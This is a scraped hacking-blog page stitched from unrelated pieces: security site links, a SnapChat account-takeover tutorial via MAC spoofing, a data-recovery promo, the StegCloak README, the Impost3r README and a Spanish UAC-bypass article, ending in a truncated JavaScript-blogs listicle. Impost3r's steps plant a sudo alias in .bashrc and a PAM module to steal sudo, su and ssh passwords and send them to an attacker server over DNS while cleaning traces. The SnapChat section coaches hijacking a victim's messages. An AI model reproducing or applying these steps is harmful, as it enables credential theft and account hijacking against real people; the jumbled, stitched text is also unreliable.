Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
In the last article, I have discussed a method on how to hack SnapChat account using SpyStealth Premium App. In this article, I am gonna show you an advanced method that how to hack SnapChat account by mac spoofing. It works same as WhatsApp hacking by mac spoofing. It's a bit more complicated than the last method discussed and requires proper attention. It involves the spoofing of the mac address of the target device. Let's move on how to perform the attack.
HOW TO HACK SNAPCHAT ACCOUNT BY MAC SPOOFING?
Note: This method will work if SnapChat is created on a phone number.
Here I will show you complete tutorial step by step of hacking the SnapChat account. Just understand each step carefully.
Find out the victim's phone and note down it's Mac address. To get the mac address in Android devices, go to Settings > About Phone > Status > Wifi Mac address. And here you'll see the mac address. Just write it somewhere. We'll use it in the upcoming steps.
As you get the target's mac address, you have to change your phone's mac address with the target's mac address. Perform the steps mentioned in this article on how to spoof mac address in android phones.
Now install SnapChat on your phone and use victim's number while you're creating an account. It'll send a verification code to victim's phone. Just grab the code and enter it here.
Once you do that, it'll set all and you'll get all chats and messages which victims sends or receives.
This method is really a good one but very difficult for the non-technical users. Only use this method if you're technical skills and have time to perform every step carefully. Otherwise, you can hack SnapChat account using Spying app.
How To Recover Files That Are Deleted From Recycle Bin
How To Recover Files That Are Deleted From Recycle Bin
Well, Windows users have a bad habit of removing files from recycle bin. Deleting useless files from Recycle Bin helps a user to save some storage space which can improve the speed of a computer. However, Windows users do that more frequently and later regret. Actually, Recycle Bin is a place from where we can get back our deleted files and folders.
Sometimes, we accidentally delete our important files and folders and due to some reason we lose them from Recycle bin too! At that time, we search for recovery methods. Well, there are many methods available over the web which can help you to recover deleted files from computer, but, when it comes to reliability, nothing can beat EaseUS.
What Is EaseUS Data Recovery Wizard?
EaseUS is one of the leading software providers which is known for its data recovery programme. EaseUS offers some free data recovery software that can help you to recover deleted, formatted or lost data from PC, laptop or removable device easily and quickly.
One of the best thing about EaseUS is that it provides tools for recycle bin recovery which can help you to get back files that you have deleted from the Recycle bin itself. EaseUS Data Recovery Wizard free can easily recover lost files, pictures, documents, videos and more from deleting, formatting, partition loss, OS crash, virus attack and other data loss cases.
How To Recover Deleted Files?
If you are struggling to get back your lost data files, then here is an easy data recovery method which will help you to get back deleted files on your computer. Below, we are going to share a mini guide on how to use EaseUS Recycle Bin Recovery to get back your deleted data.
Step 1. First of all, you need to download and install EaseUS Data Recovery Wizard on your Windows computer and then launch it normally. You need to select the location where you want to scan and then click on 'Scan'
Step 2. Now, wait for few minutes until the tool finishes scanning your drive. The tool search for files that got deleted or cleaned from the Recycle Bin.
Step 3. Now it will show you files that you can recover. Here you need to click on the file which you want to recover and click on 'Recover'
That's it, you are done! This is how you can use EaseUS data recovery to get back your deleted files on your computer.
Benefits of EaseUS Data Recovery
Well, the data recovery tool provided by EaseUS comes with many benefits. It can not only recover accidentally deleted files, but it can also recover data in case of Virus Attacks, Hard Disk Damage, OS Crash etc.
You can also use this awesome data recovery wizard to recover deleted files from External Disk, USB Drive, Camcorder, Mobile Devices, Zip Drive, iPod, Music Player and more.
Overall, this is one of the best data recovery tools you can have on your Windows computer. EaseUS Data Recovery also has a free version with restricted features. Overall, this is a stress-free solution to get back your deleted files
StegCloak is a pure JavaScript steganography module designed in functional programming style, to hide secrets inside text by compressing and encrypting with Zero Width Characters. It can be used to safely watermark strings, invisible scripts on webpages, texts on social media or for any other covert communication. Completely invisible!. See how it works in-depth here
Features
Protect your invisible secret using passwords and HMAC integrity
Cryptographically secure by encrypting the invisible secret using AES-256-CTR.
Uses 7 Invisible characters in unicode characters that works everywhere in the web. Including the most important ones Tweets, Gmail, Whatsapp, Telegram, Instagram, Facebook etc.
Maximum Compression to reduce the payload (LZ, Huffman).
Completely invisible, uses Zero Width Characters instead of white spaces or tabs.
Super fast! Hides the Wikipedia page-source for steganography (800 lines and 205362 characters) within a covertext of 3 words in under one second.
Written in pure functional style.
Usage - Available as an API module, a CLI and also a Web Interface (optimized with web workers).
Installing Using npm,
$ npm install -g stegcloak
Using npm (to use it locally in your program),
$ npm install stegcloak
How it works
CLI Usage
Hide
$ stegcloak hide
Options:
hide [options] [secret] [cover]
-f, --file <file> Extract input from file -n, --nocrypt If you don't need encryption (default: false) -i, --integrity If additional security of preventing tampering is needed (default: false) -o, --output <output> Stream the results to an output file -h, --help display help for command
Reveal
$ stegcloak reveal
Options:
reveal [data]
-f, --file <file> Extract input from file -cp, --clip Copy Data directly from clipboard -o, --output <output> Stream the secret to an output file -h, --help display help for command
API Usage
const StegCloak = require('stegcloak');
const stegcloak = new StegCloak(true, false); // Initializes with encryption true and hmac false for hiding
// These arguments are used only during hide
// Can be changed later by switching boolean flags for stegcloak.encrypt and stegcloak.integrity
What's HMAC and do I need it?
HMAC is an additional fingerprint security step taken towards tampering of texts and to verify if the message received was actually sent by the intended sender. If the data is sent through WhatsApp, Messenger or any social media platform, this is already taken care of! However, if you are using StegCloak in your program to safely transmit and retrieve, this option can be enabled and StegCloak takes care of it.
Hide
stegcloak.hide(secret,password,cover) -> string
const magic = stegcloak.hide("Voldemort is back", "mischief managed", "The WiFi's not working here!");
// Uses stegcloak.encrypt and stegcloak.integrity booleans for obfuscation
console.log(magic); // The WiFi's not working here!
// Automatically detects if encryption or integrity checks were done during hide and acts accordingly
console.log(secret); // Voldemort is back
Important
Stegcloak does'nt solve the alice-bob-warden problem, its powerful only when people are not looking for it and it helps you to achieve that really well given its invisible properties around the web! It could be safely used for watermarking in forums, invisible tweets,irc chats,social media etc. Please don't use it when you know there's someone who is actively sniffing your data looking at the unicode characters through a data analysis tool, in that case even though the secret encoded cannot be deciphered the fact lies that the warden ( Middle-man ) now knows some secret communication took place, cause he would have noticed an unusual amount of special invisible characters.
Resources The following papers were referred to for insight and understanding of using Zero Width Characters in steganography.
Milad Taleby Ahvanooey, Qianmu Li , Jun Hou, Ahmed Raza Rajput and Chen Yini
Modern Text Hiding, Text Steganalysis, and Applications: A Comparative Analysis
Taleby Ahvanooey, Milad & Li, Qianmu & Hou, Jun & Dana Mazraeh, Hassan & Zhang, Jing.
AITSteg: An Innovative Text Steganography Technique for Hidden Transmission of Text Message via Social Media. IEEE Access
Acknowledgements The StegCloak logo was designed by Smashicons.
"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis." read more...
Impost3r is a tool that aim to steal many kinds of linux passwords(including ssh,su,sudo) written by C. Attackers can use Impost3r to make a trap to steal the legal user's passwords XD
This tool is limited to security research and teaching, and the user bears all legal and related responsibilities caused by the use of this tool! The author does not assume any legal and related responsibilities!
Features
Automatically clean the track
Use DNS to transfer the result
Really hard for legal users can feel this attack
Dependencies
gcc
Usage
Impost3r can be used to steal passwords including sudo, su, and ssh services. These three services can be roughly divided into two categories, sudo and ssh/su. I will discuss them below
Steal sudo password
Only need ordinary user's privilege,and can only steal current user's password.
First i will assume that attacker has controled a server and the privilege is ordinary user
Then copy the original .bashrc file cp ~/.bashrc /tmp/,and put this copy anywhere you like(In this case,i will use /tmp/)
Edit the original .bashrc,and add following sentences at the end of file(The param "/tmp/.impost3r" must be as the same as the following FILENAME you specified):
alias sudo='impost3r() { if [ -f "/tmp/.impost3r" ]; then /tmp/.impost3r "$@" && unalias sudo else unalias sudo;sudo "$@" fi }; impost3r'
Then,save it and run source ~/.bashrc
After that,attacker needs to edit the source code of Impost3r/sudo/main.c:
/* Custom setting */ # define FILENAME "/tmp/.impost3r" \\Set the location where the Impost3r is on the server you attack. # define BACKUP_BASHRC "/tmp/.bashrc" \\Set the location where the backup .bashrc is on the server you attack. # define SAVE_OR_SEND 0 \\Set the method you want to apply when Impost3r get the password,(send to your server=0,save the result on the current server=1,default is send) /* Send to server */ # define MAX_RESEND 30 \\Set the maximum times that Impost3r will try to resends stealing result to attacker's server # define RESEND_INTERVAL 5 \\Set the interval of resending stealing result. # define REMOTE_ADDRESS "192.168.0.12" \\Set the malicious server ip address that you want to receive stealing result # define REMOTE_PORT 53 \\Set the malicious server port
/* Save to local */ # define SAVE_LOCATION "/tmp/.cache" \\Set the result file location if you want to save the result on the server
Save the source code,and run make
Get the .impost3r file after compiling.
Upload .impost3r file to the target server and put it under the FILENAME you specified.
The last thing you should do is run a dns server service on your server(REMOTE_ADDRESS)'s port(REMOTE_PORT),and waiting for the bonus.
Demo
Tips
When Impost3r steal the sudo password successfully,it will automatically clean the traces it make on the target server.
Steal ssh/su password
Stealing the ssh/su password is different from the sudo password stealing method above. You need root privilege.And this method can steal all user's password The following uses Ubuntu as an example, Centos is similar,but the file locations mentioned may be slightly different
First, assume that the attacker controls a server,and gets the root privilege
Then edit the /ssh_su/main.c source code file of Impost3r
/* Custom setting */ # define SSH_OR_BOTH 0 \\Set stealing mode, 0 means only steal ssh password, 1 means steal ssh and su password, the default is 0 (the difference will be mentioned later) # define SAVE_OR_SEND 0 \\Set the method you want to apply when Impost3r get the password,(send to your server=0,save the result on the current server=1,default is send)
/* Send to server */ # define MAX_RESEND 30 \\Set the maximum times that Impost3r will try to resends stealing result to attacker's server(This option is valid only when SSH_OR_BOTH is 0) # define RESEND_INTERVAL 5 \\Set the interval of resending stealing result.(This option is valid only when SSH_OR_BOTH is 0) # define REMOTE_ADDRESS "192.168.0.12" \\Set the malicious server ip address that you want to receive stealing result # define REMOTE_PORT 53 \\Set the malicious server port
/* Save to local */ # define SAVE_LOCATION "/tmp/.sshsucache" \\Set the result file location if you want to save the result on the server
After the modification is completed, save and execute ```make''` in the current directory
Get the compiled file impost3r.so
Upload the compiled impost3r.so to the target server under /lib/x86_64-linux-gnu/security folder.(Different machines may have different folder names)
Enter /etc/pam.d, and then there are two cases. If the selected mode is to steal only the ssh password, then you need to execute vi sshd and add at the following statement at the end of the file.
Save and exit, restart the sshd service service sshd restart
But if you choose to steal the ssh and su passwords together, you need to execute vi common-auth, add the same statement, save and exit and restart the sshd service
Attacker starts the dns server program on his server, waiting for a legitimate user to log on the target server via ssh or use su to switch users to get the passwords.
Demo
Tips
In the case of stealing the ssh/su password, Impost3r cannot clear the traces due to permission reasons, so the attacker needs to clear them himself
Please note that if you set to steal only ssh passwords, you can be guaranteed that you will receive the stolen results nearly 100 percent, but if you set to steal both, you will not be guaranteed that you will receive the results 100 percent. (Choose to save result locally won't have this problem,Only dns will)
It is not recommended to steal the su password since the user's ssh password is the same as the su password.It's pretty enough to have ssh password i think.
Attention
The Dns server progran I use is Fdns,and I change some params,you can find the changed source code under the Fdns folder,and use gcc -o dns main.c util.c to compile it by yourself.And actually you can use any kinds of dns server,but the dns server you use must can make a dns response to client instead of just recording dns request(You also need recording dns request,or you will lose the stealing result).
This porject is coding just for fun , the logic structure and code structure are not strict enough, please don't be so serious about it,and also welcome suggestions and prs.
Por supuesto, si lo que quieres es aplicar Máxima Seguridad a tu Windows, esto es algo que se aplica en primer paso. Es decir, quitar la configuración por defecto y aplicar la que exige a todos los binarios la confirmación UAC, y no permite el autoelevado. Vamos un poco más allá para entenderlo. ¿Cómo nos protegemos de los bypasses de UAC? Vamos primero a ver la GPO, para lo que buscamos:
Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> User Account Control: Behaviour of the elevation prompt for administrators in Admin Approval Mode
En el caso de un bypass de UAC debes partir desde un nivel de integridad medio. Por esta razón, el módulo de Metasploit, cuando se hace cualquier bypass de UAC de forma automática, nos muestra los diferentes chequeos, entre ellos el nivel de integridad actual.
Necesitamos que un usuario que tiene privilegios para realizar acciones como administrador, haya ejecutado un proceso y que no haya hecho uso de dichos privilegios para, una vez comprometido su proceso, podamos aprovechar este hecho y hacer el bypass de UAC. Puede ser lioso, pero es lógico. Si el usuario hubiera lanzado el proceso como administrador, el nivel de integridad ya serÃa alto, no medio.
Figura 8: Configuraciones de los Modos UAC en Windows 7
¿Era más seguro? A priori, y basándonos en este artÃculo, sÃ. Pero las quejas llegaron. Los usuarios no estaban preparados para ello y se rebajaron algunas configuraciones. Esto fue en Windows 7, si no recuerdo mal, que puedo recordarlo mal.
Y un bypass de UAC entonces, ¿dónde tiene sentido?
Figura 9: UAC-a-Mola: Bypassing UAC using Fileless techniques
Pero a la hora de poner en práctica o de utilizar en un Ethical Hacking solo tiene sentido en remoto, porque si tienes un usuario que cumple los requisitos del bypass de UAC y tienes acceso fÃsico te vale ejecutar:
Aquà tenemos una bifurcación: bypass de UAC efectivo para el pentesting o bypass de UAC que prueba un concepto, pero no es efectivo para el pentesting. Como ejemplo podemos utilizar algunos ejemplos con interfaces gráficas.
Desde aquÃ, todo lo que sea código que se ejecute heredará el nivel de integridad alto, por lo que podemos ir al menú "Help". La opción "Help Topics" nos muestra la ayuda del visor de eventos. Pinchando con el botón derecho en la parte donde se muestra el texto se puede ver una opción que es "View Source".
Figura 11: View Source
Al ejecutar "View Source" se ve un bloc de notas con un texto. Claro, si analizamos el bloc de notas con Proccess Explorer podremos ver que el notepad.exe se ejecuta en un nivel de integridad alto. Aquà ya tenemos lo que buscamos, si abrimos un cuadro de diálogo tenemos la posibilidad de ejecutar lo que se quiera.
Figura 12: notepad.exe con nivel de integridad alto
En la siguiente imagen de Process Explorer se puede ver el nivel de integridad y cómo desde el mmc.exe (abierto con eventvwr.exe directamente) sin que el UAC salte, porque es un binario que cumple las condiciones comentadas anteriormente, se van abriendo diferentes procesos hasta llegar a una cmd.exe.
With two decades of improvement, JavaScript has become one of the most popular programming languages of all time. The journey started in 1995 when Brendan Eich created JavaScript in just 10 days. From there, it has seen multiple revisions, drafts, and growth in the form of frameworks, API's, modules, etc. Today, we will go forward and list the top JavaScript blogs from the internet so that you can enjoy the lastest development in the field of JavaScript.
According to RedMonk programming language rankings and GitHut.info, JavaScript is leading the pack in the terms of repositories and the most discussed programming language on StackOverFlow. The numbers itself speaks about the future of JavaScript as it has grown beyond the initial capabilities of simple DOM manipulations.
Learning JavaScript, on the other hand, can be a tricky proposition. New libraries, features, API's or Style Guide, pop up almost every day. The speed of iteration is beyond imagination, and that is why reading leading JavaScript blogs are the best approach to keep up with new changes.
JavaScript is blessed with experts that regularly contribute to the community using live streams, videos, blogs, podcasts, conferences and open source projects. An example of a cool experienced Javascript programmer is evilsoft who broadcasts awesome Javascript projects weekly on LiveEdu..
Some blogs are just gold even when they are not updated frequently. To help you reach the best content on JavaScript, let's list the best JavaScript blogs on the internet. The following blogs have a huge fan following and contain epic JavaScript content.
David Walsh is a renowned name in the JavaScript world. He started his career with DZone, but his first real break came while working for SitePen as a Software Engineer. His blog composes of topics related to JavaScript, personal thoughts, guides and much more. The blog design is captivating and is going to hook you up on the first visit. Currently, he is working as a Senior Web Developer at Mozilla.
2. DailyJS
DailyJS is one of the best JavaScript blogs on the internet. The blog was started by Alex R. Young, an entrepreneur and Node.js expert in 2009. However, there are recent changes that don't sound great. Currently, the blog is no longer updated, but that does not make the content useless at all. The blog covers diverse content on JavaScript including frameworks, API's, libraries, etc.
SitePoint is one of the leading web development portals since 2000. The main attraction of SitePoint is the collection of highly detailed articles. They are aimed at teaching something new to the readers. JavaScript, on the other hand, is one of the leading topics on the website where experts around the world contribute regularly. The rate of the new blog post is high, and you won't find a blog post that doesn't teach you something new. Truly, a great learning place for any JavaScript developer.
Not technically a blog, but if you love JavaScript, then you need to follow the website's offerings. JavaScript.com news section is an aggregator for excellent JavaScript news, tutorials, guides, and much more. All you need to do is move to their news section and discover tons of new content surrounding JavaScript. The domain is owned by CodeSchool and is mainly utilized to contribute to the community and a landing page to their courses.
What's the best place to find JavaScript knowledge? The inventor? Well, you are right. Brendan Eich, the creator of JavaScript, keeps his blog with filled with his musings and other excellent thought processes about JavaScript. You can also find videos on the blog. Virtually, the blog is the mind of JavaScript where you understand it in an entirely different manner.
JavaScript Playground is yet another great place to get started with all the different JavaScript frameworks, API, and libraries. The focus is to work with the JavaScript ecosystem and provide high quality blog articles, screencast, and podcast for the audience. They also blog about different JavaScript guidelines, tips, and tricks.
If you are looking for a superhero to fetch you the best resources on JavaScript, then you have finally found one. Superhero.js is a simple website that aims to collect everything related to JavaScript including videos, articles, presentations, etc. The content is divided into meaningful sections such as "Understanding JavaScript", "Organize Your Code", etc. Also, the page is regularly updated with new information.
Another "not a blog entry" into the list — JavaScript Jabber is a weekly podcast on JavaScript. Each podcast is around 1 hour of jabber and will sure have something for you to learn. They keep their tab on everything related to JavaScript, including core concepts to popular Framework discussions.
Is medium a blog? Technically, not, but it contains high quality JavaScript articles. Medium is a way to connect to the audience so be ready to read many opinions on how JavaScript should have been, and what's wrong with JavaScript. Other than the ramblings, it hosts amazing JavaScript content such as Speed Up Web Apps.
Smashing Magazine is one of the oldest websites covering web designing and development. They have a dedicated section for JavaScript, which is constantly updated with tutorials of high caliber. The tutorials surround other web development ideas such as UX, Productivity, etc.
Conclusion
Here are the ten best JavaScript blogs to improve your coding skills. The blogs and mix of other content types will help you to keep up with new changes in JavaScript field, and improve yourself accordingly.
If you are new to JavaScript and want to get started as soon as possible, check out the JavaScript learn section on LiveEdu.tv. And, yes, it is the most popular programming language on LiveEdu.tv which can benefit from your attention! Also, don't forget to leave a comment on how the JavaScript category page can be improved. We are listening!
Dr. Michael J. Garbade
About Author Dr. Michael Jurgen Garbade is the founder of LiveEdu.TV, Kyuda, Education Ecosystem. He is future Venture Capitalist, Future Politician and always on the lookout for the Next Big Challenge. Obtained Masters in business administration and physics, and a Ph.D. in finance with professional work experience in high-paced environments at Fortune 500 companies like Amazon and General Electric. Expertize: Python, PHP, Sencha Touch & C++, SEO, Finance, Strategy & E-commerce. He speaks English and German and has worked in the US, Europe, and Asia. At Education Ecosystem he is the CEO and runs business operations.
Para consultas puedes usar el 
